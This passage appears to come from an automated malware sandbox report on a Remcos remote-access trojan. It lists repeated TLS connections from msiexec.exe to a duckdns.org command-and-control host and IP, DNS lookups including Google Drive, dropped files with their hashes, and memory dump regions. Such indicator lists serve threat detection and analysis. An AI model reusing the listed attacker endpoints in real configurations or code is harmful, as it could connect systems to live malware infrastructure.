    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
    88 B
    3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    msiexec.exe
    52 B
    1
  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    drive.google.com
    dns
    msiexec.exe
    62 B
    78 B
    1
    1

    DNS Request

    drive.google.com

    DNS Response

    142.250.187.206

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    206.187.250.142.in-addr.arpa
    dns
    74 B
    113 B
    1
    1

    DNS Request

    206.187.250.142.in-addr.arpa

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    msiexec.exe
    74 B
    90 B
    1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.180.1

  • 8.8.8.8:53
    1.180.250.142.in-addr.arpa
    dns
    72 B
    110 B
    1
    1

    DNS Request

    1.180.250.142.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    c.pki.goog
    dns
    msiexec.exe
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    216.58.201.99

  • 8.8.8.8:53
    o.pki.goog
    dns
    msiexec.exe
    56 B
    107 B
    1
    1

    DNS Request

    o.pki.goog

    DNS Response

    216.58.201.99

  • 8.8.8.8:53
    99.201.58.216.in-addr.arpa
    dns
    72 B
    169 B
    1
    1

    DNS Request

    99.201.58.216.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    a458386d9.duckdns.org
    dns
    msiexec.exe
    134 B
    150 B
    2
    2

    DNS Request

    a458386d9.duckdns.org

    DNS Request

    a458386d9.duckdns.org

    DNS Response

    192.169.69.26

  • 8.8.8.8:53
    26.69.169.192.in-addr.arpa
    dns
    72 B
    103 B
    1
    1

    DNS Request

    26.69.169.192.in-addr.arpa

  • 8.8.8.8:53
    180.129.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    180.129.81.91.in-addr.arpa

  • 8.8.8.8:53
    31.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    31.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    a458386d9.duckdns.org
    dns
    msiexec.exe
    67 B
    83 B
    1
    1

    DNS Request

    a458386d9.duckdns.org

    DNS Response

    192.169.69.26

MITRE ATT&CK Enterprise v15


Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    8f325b4591d8ab596342c958c8f79a4d

    SHA1

    be25bd93ad867ec17a908deddb8fe2ad8bc4323f

    SHA256

    94d62bbfd49151981acc0b4e859fb1771fb5024d3805ca1cb3f8b5e0c620843d

    SHA512

    a64ff0bb576f1621df7ec4cb270e891849051ec327af486ae4e454addc36f72fc26a43f32820d733d99b0512bea0c3535dc1f0fd02a7999b57068ee71569be3c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4yl3nq0.ymp.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Inflicts.Kol

    Filesize

    451KB

    MD5

    a0ead43a9e0373f5a840cf296b8b62ba

    SHA1

    e4a16dcdd161437d6aa66b5f2e8a8f2350f83c07

    SHA256

    e1171748791ea73409433b75b28fd35fcd327d76e909eed3bfcd033c1e6e1982

    SHA512

    5371b93899ffa12cbc5e5f99a03a3ac39eef2fce77030e3998efa88f71d907184476ee36aa3b4c0808a58138a323bb0a0cb9bb1380c4dc1ef1eb704f30f4d8ff

  • memory/624-46-0x0000000007190000-0x00000000071B2000-memory.dmp

    Filesize

    136KB

  • memory/624-45-0x0000000007230000-0x00000000072C6000-memory.dmp

    Filesize

    600KB

  • memory/624-49-0x00000000089F0000-0x000000000BEE3000-memory.dmp

    Filesize

    52.9MB

  • memory/624-47-0x0000000008440000-0x00000000089E4000-memory.dmp

    Filesize

    5.6MB

  • memory/624-44-0x0000000006510000-0x000000000652A000-memory.dmp

    Filesize

    104KB

  • memory/624-25-0x00000000049D0000-0x0000000004A06000-memory.dmp

    Filesize

    216KB

  • memory/624-26-0x0000000005040000-0x0000000005668000-memory.dmp

    Filesize

    6.2MB

  • memory/624-27-0x00000000056E0000-0x0000000005702000-memory.dmp

    Filesize

    136KB

  • memory/624-28-0x0000000005780000-0x00000000057E6000-memory.dmp

    Filesize

    408KB

  • memory/624-29-0x0000000005860000-0x00000000058C6000-memory.dmp

    Filesize

    408KB

  • memory/624-39-0x0000000005990000-0x0000000005CE4000-memory.dmp

    Filesize

    3.3MB

  • memory/624-43-0x0000000007810000-0x0000000007E8A000-memory.dmp

    Filesize

    6.5MB

  • memory/624-41-0x0000000005F80000-0x0000000005F9E000-memory.dmp

    Filesize

    120KB

  • memory/624-42-0x0000000005FC0000-0x000000000600C000-memory.dmp

    Filesize

    304KB

  • memory/1620-62-0x0000000001000000-0x0000000002254000-memory.dmp

    Filesize

    18.3MB

  • memory/1620-63-0x0000000001000000-0x0000000002254000-memory.dmp

    Filesize

    18.3MB

  • memory/2892-16-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2892-24-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2892-18-0x00007FFF14D33000-0x00007FFF14D35000-memory.dmp

    Filesize

    8KB

  • memory/2892-4-0x00007FFF14D33000-0x00007FFF14D35000-memory.dmp

    Filesize

    8KB

  • memory/2892-21-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2892-15-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2892-20-0x00007FFF14D30000-0x00007FFF157F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2892-10-0x0000027684EC0000-0x0000027684EE2000-memory.dmp

    Filesize

    136KB
